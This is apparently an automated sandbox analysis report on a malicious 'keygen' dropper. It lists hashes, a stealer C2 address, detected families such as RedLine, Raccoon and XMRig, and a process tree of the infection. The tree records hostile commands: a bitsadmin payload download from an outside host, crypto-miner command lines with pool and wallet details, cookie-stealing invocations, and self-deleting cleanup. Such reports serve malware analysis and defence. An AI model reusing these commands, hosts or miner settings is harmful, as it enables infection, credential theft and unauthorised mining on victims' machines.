Resubmissions

24-04-2021 20:33

210424-t3nc6v2zm6 10

24-04-2021 20:33

210424-tvfj4vfree 10

Analysis

  • max time kernel
    1800s
  • max time network
    1774s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    24-04-2021 20:33

General

  • Target

    keygen-step-4.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Windows security bypass 2 TTPs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 2 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 57 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 14 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 10 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
    • Modifies registry class
    PID:2740
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2724
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
      PID:2604
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
      1⤵
        PID:2544
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2492
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
        1⤵
          PID:1908
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s SENS
          1⤵
            PID:1372
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s UserManager
            1⤵
              PID:1340
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Themes
              1⤵
                PID:1200
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                1⤵
                  PID:1084
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                  1⤵
                  • Drops file in System32 directory
                  PID:340
                  • C:\Users\Admin\AppData\Roaming\svgesfv
                    C:\Users\Admin\AppData\Roaming\svgesfv
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:4652
                    • C:\Users\Admin\AppData\Roaming\svgesfv
                      C:\Users\Admin\AppData\Roaming\svgesfv
                      3⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:2232
                  • C:\Users\Admin\AppData\Roaming\bsgesfv
                    C:\Users\Admin\AppData\Roaming\bsgesfv
                    2⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: MapViewOfSection
                    PID:5396
                  • C:\Users\Admin\AppData\Roaming\svgesfv
                    C:\Users\Admin\AppData\Roaming\svgesfv
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:4460
                    • C:\Users\Admin\AppData\Roaming\svgesfv
                      C:\Users\Admin\AppData\Roaming\svgesfv
                      3⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:4632
                  • C:\Users\Admin\AppData\Roaming\bsgesfv
                    C:\Users\Admin\AppData\Roaming\bsgesfv
                    2⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: MapViewOfSection
                    PID:3912
                  • C:\Users\Admin\AppData\Roaming\svgesfv
                    C:\Users\Admin\AppData\Roaming\svgesfv
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:5380
                    • C:\Users\Admin\AppData\Roaming\svgesfv
                      C:\Users\Admin\AppData\Roaming\svgesfv
                      3⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      PID:3776
                  • C:\Users\Admin\AppData\Roaming\bsgesfv
                    C:\Users\Admin\AppData\Roaming\bsgesfv
                    2⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    PID:5132
                  • C:\Windows\system32\rundll32.exe
                    C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\ltJNQrS\ltJNQrS.dll",ltJNQrS
                    2⤵
                    • Windows security modification
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    PID:3952
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                  1⤵
                    PID:996
                  • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
                    "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
                    1⤵
                    • Checks computer location settings
                    • Suspicious use of WriteProcessMemory
                    PID:3892
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                      2⤵
                      • Executes dropped EXE
                      • Drops file in Program Files directory
                      • Suspicious use of SetWindowsHookEx
                      • Suspicious use of WriteProcessMemory
                      PID:1544
                      • C:\Windows\SysWOW64\rundll32.exe
                        "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                        3⤵
                        • Loads dropped DLL
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:2736
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3688
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:1512
                      • C:\Users\Admin\AppData\Local\Temp\is-V6687.tmp\Install.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-V6687.tmp\Install.tmp" /SL5="$80068,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:1020
                        • C:\Users\Admin\AppData\Local\Temp\is-B5ER8.tmp\Ultra.exe
                          "C:\Users\Admin\AppData\Local\Temp\is-B5ER8.tmp\Ultra.exe" /S /UID=burnerch1
                          4⤵
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:2904
                          • C:\Program Files\Microsoft Office\RIXCSNSUOL\ultramediaburner.exe
                            "C:\Program Files\Microsoft Office\RIXCSNSUOL\ultramediaburner.exe" /VERYSILENT
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:3704
                            • C:\Users\Admin\AppData\Local\Temp\is-2ROA4.tmp\ultramediaburner.tmp
                              "C:\Users\Admin\AppData\Local\Temp\is-2ROA4.tmp\ultramediaburner.tmp" /SL5="$5008C,281924,62464,C:\Program Files\Microsoft Office\RIXCSNSUOL\ultramediaburner.exe" /VERYSILENT
                              6⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of WriteProcessMemory
                              PID:2560
                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                7⤵
                                • Executes dropped EXE
                                PID:3600
                          • C:\Users\Admin\AppData\Local\Temp\43-bbcdd-e2a-5fd8e-9ef3143e521b4\Daegemukewa.exe
                            "C:\Users\Admin\AppData\Local\Temp\43-bbcdd-e2a-5fd8e-9ef3143e521b4\Daegemukewa.exe"
                            5⤵
                            • Executes dropped EXE
                            • Checks computer location settings
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3524
                          • C:\Users\Admin\AppData\Local\Temp\77-53177-1bb-b09b1-371f61327382b\Winaevugaju.exe
                            "C:\Users\Admin\AppData\Local\Temp\77-53177-1bb-b09b1-371f61327382b\Winaevugaju.exe"
                            5⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:4168
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2knki2g2.31c\instEU.exe & exit
                              6⤵
                              • Suspicious use of WriteProcessMemory
                              PID:5056
                              • C:\Users\Admin\AppData\Local\Temp\2knki2g2.31c\instEU.exe
                                C:\Users\Admin\AppData\Local\Temp\2knki2g2.31c\instEU.exe
                                7⤵
                                  PID:3100
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zx4itneb.agh\google-game.exe & exit
                                6⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4760
                                • C:\Users\Admin\AppData\Local\Temp\zx4itneb.agh\google-game.exe
                                  C:\Users\Admin\AppData\Local\Temp\zx4itneb.agh\google-game.exe
                                  7⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetWindowsHookEx
                                  PID:4180
                                  • C:\Windows\SysWOW64\rundll32.exe
                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                    8⤵
                                    • Loads dropped DLL
                                    PID:4272
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ylrovhvr.vjc\md1_1eaf.exe & exit
                                6⤵
                                  PID:680
                                  • C:\Users\Admin\AppData\Local\Temp\ylrovhvr.vjc\md1_1eaf.exe
                                    C:\Users\Admin\AppData\Local\Temp\ylrovhvr.vjc\md1_1eaf.exe
                                    7⤵
                                    • Executes dropped EXE
                                    • Checks whether UAC is enabled
                                    PID:5208
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sjaucc3e.wqi\y1.exe & exit
                                  6⤵
                                    PID:5364
                                    • C:\Users\Admin\AppData\Local\Temp\sjaucc3e.wqi\y1.exe
                                      C:\Users\Admin\AppData\Local\Temp\sjaucc3e.wqi\y1.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:5588
                                      • C:\Users\Admin\AppData\Local\Temp\JcwOjCdzZg.exe
                                        "C:\Users\Admin\AppData\Local\Temp\JcwOjCdzZg.exe"
                                        8⤵
                                        • Executes dropped EXE
                                        • Modifies system certificate store
                                        PID:5740
                                        • C:\Users\Admin\AppData\Roaming\1619296653313.exe
                                          "C:\Users\Admin\AppData\Roaming\1619296653313.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619296653313.txt"
                                          9⤵
                                          • Executes dropped EXE
                                          PID:2056
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\JcwOjCdzZg.exe"
                                          9⤵
                                            PID:2276
                                            • C:\Windows\SysWOW64\PING.EXE
                                              ping 127.0.0.1 -n 3
                                              10⤵
                                              • Runs ping.exe
                                              PID:5136
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\sjaucc3e.wqi\y1.exe"
                                          8⤵
                                            PID:4928
                                            • C:\Windows\SysWOW64\timeout.exe
                                              timeout /T 10 /NOBREAK
                                              9⤵
                                              • Delays execution with timeout.exe
                                              PID:5460
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ue5z1uvc.yz0\askinstall39.exe & exit
                                        6⤵
                                          PID:5668
                                          • C:\Users\Admin\AppData\Local\Temp\ue5z1uvc.yz0\askinstall39.exe
                                            C:\Users\Admin\AppData\Local\Temp\ue5z1uvc.yz0\askinstall39.exe
                                            7⤵
                                            • Executes dropped EXE
                                            PID:5932
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /c taskkill /f /im chrome.exe
                                              8⤵
                                                PID:1544
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /f /im chrome.exe
                                                  9⤵
                                                  • Kills process with taskkill
                                                  PID:5708
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\u5m5jz3w.akg\inst.exe & exit
                                            6⤵
                                              PID:5812
                                              • C:\Users\Admin\AppData\Local\Temp\u5m5jz3w.akg\inst.exe
                                                C:\Users\Admin\AppData\Local\Temp\u5m5jz3w.akg\inst.exe
                                                7⤵
                                                • Executes dropped EXE
                                                PID:4812
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gvvw5lwt.x4j\SunLabsPlayer.exe /S & exit
                                              6⤵
                                                PID:6032
                                                • C:\Users\Admin\AppData\Local\Temp\gvvw5lwt.x4j\SunLabsPlayer.exe
                                                  C:\Users\Admin\AppData\Local\Temp\gvvw5lwt.x4j\SunLabsPlayer.exe /S
                                                  7⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Drops file in Program Files directory
                                                  PID:5168
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmA4A4.tmp\tempfile.ps1"
                                                    8⤵
                                                      PID:4816
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmA4A4.tmp\tempfile.ps1"
                                                      8⤵
                                                        PID:4792
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmA4A4.tmp\tempfile.ps1"
                                                        8⤵
                                                          PID:1900
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmA4A4.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:2168
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmA4A4.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:416
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmA4A4.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:5532
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmA4A4.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:5696
                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                  "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                  8⤵
                                                                  • Download via BitsAdmin
                                                                  PID:4692
                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -peb4jzywoorYfqjx -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                  8⤵
                                                                    PID:5280
                                                                  • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pacW6lxxG1IaGlAt -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    PID:5652
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmA4A4.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:3312
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmA4A4.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:4320
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmA4A4.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:5180
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmA4A4.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:2396
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmA4A4.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:4244
                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ltJNQrS\ltJNQrS.dll" ltJNQrS
                                                                              8⤵
                                                                              • Loads dropped DLL
                                                                              PID:4420
                                                                              • C:\Windows\system32\rundll32.exe
                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ltJNQrS\ltJNQrS.dll" ltJNQrS
                                                                                9⤵
                                                                                • Loads dropped DLL
                                                                                • Drops file in System32 directory
                                                                                PID:4260
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmA4A4.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:4912
                                                                                • C:\Windows\System32\Conhost.exe
                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  9⤵
                                                                                  • Executes dropped EXE
                                                                                  • Drops file in Program Files directory
                                                                                  PID:5280
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmA4A4.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:5356
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmA4A4.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                  • Drops file in Program Files directory
                                                                                  PID:4808
                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    9⤵
                                                                                    • Checks for any installed AV software in registry
                                                                                    PID:5696
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmA4A4.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:1808
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmA4A4.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                      PID:4652
                                                                                    • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                      "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Drops file in Program Files directory
                                                                                      PID:5240
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eqx2gzyb.1ip\GcleanerWW.exe /mixone & exit
                                                                                  6⤵
                                                                                    PID:4344
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1moa1bml.ill\toolspab1.exe & exit
                                                                                    6⤵
                                                                                      PID:5520
                                                                                      • C:\Users\Admin\AppData\Local\Temp\1moa1bml.ill\toolspab1.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\1moa1bml.ill\toolspab1.exe
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:2124
                                                                                        • C:\Users\Admin\AppData\Local\Temp\1moa1bml.ill\toolspab1.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\1moa1bml.ill\toolspab1.exe
                                                                                          8⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Checks SCSI registry key(s)
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:5548
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1dfoesxl.s1w\c7ae36fa.exe & exit
                                                                                      6⤵
                                                                                        PID:5512
                                                                                        • C:\Users\Admin\AppData\Local\Temp\1dfoesxl.s1w\c7ae36fa.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\1dfoesxl.s1w\c7ae36fa.exe
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Checks SCSI registry key(s)
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:2348
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ytaf5aby.lnr\app.exe /8-2222 & exit
                                                                                        6⤵
                                                                                          PID:5928
                                                                                          • C:\Users\Admin\AppData\Local\Temp\ytaf5aby.lnr\app.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\ytaf5aby.lnr\app.exe /8-2222
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4332
                                                                                            • C:\Users\Admin\AppData\Local\Temp\ytaf5aby.lnr\app.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\ytaf5aby.lnr\app.exe" /8-2222
                                                                                              8⤵
                                                                                              • Executes dropped EXE
                                                                                              • Checks processor information in registry
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:5172
                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  • Modifies system certificate store
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:4268
                                                                                  • C:\Users\Admin\AppData\Roaming\6B91.tmp.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\6B91.tmp.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:5040
                                                                                    • C:\Users\Admin\AppData\Roaming\6B91.tmp.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\6B91.tmp.exe"
                                                                                      4⤵
                                                                                        PID:5172
                                                                                    • C:\Users\Admin\AppData\Roaming\6DB5.tmp.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\6DB5.tmp.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Adds Run key to start application
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:3100
                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w5349@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                        4⤵
                                                                                          PID:4720
                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                          -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w7189 --cpu-max-threads-hint 50 -r 9999
                                                                                          4⤵
                                                                                          • Blocklisted process makes network request
                                                                                          PID:5096
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                        3⤵
                                                                                          PID:4404
                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                            ping 127.0.0.1
                                                                                            4⤵
                                                                                            • Runs ping.exe
                                                                                            PID:2196
                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Checks whether UAC is enabled
                                                                                        PID:5012
                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Adds Run key to start application
                                                                                        PID:3848
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4856
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5988
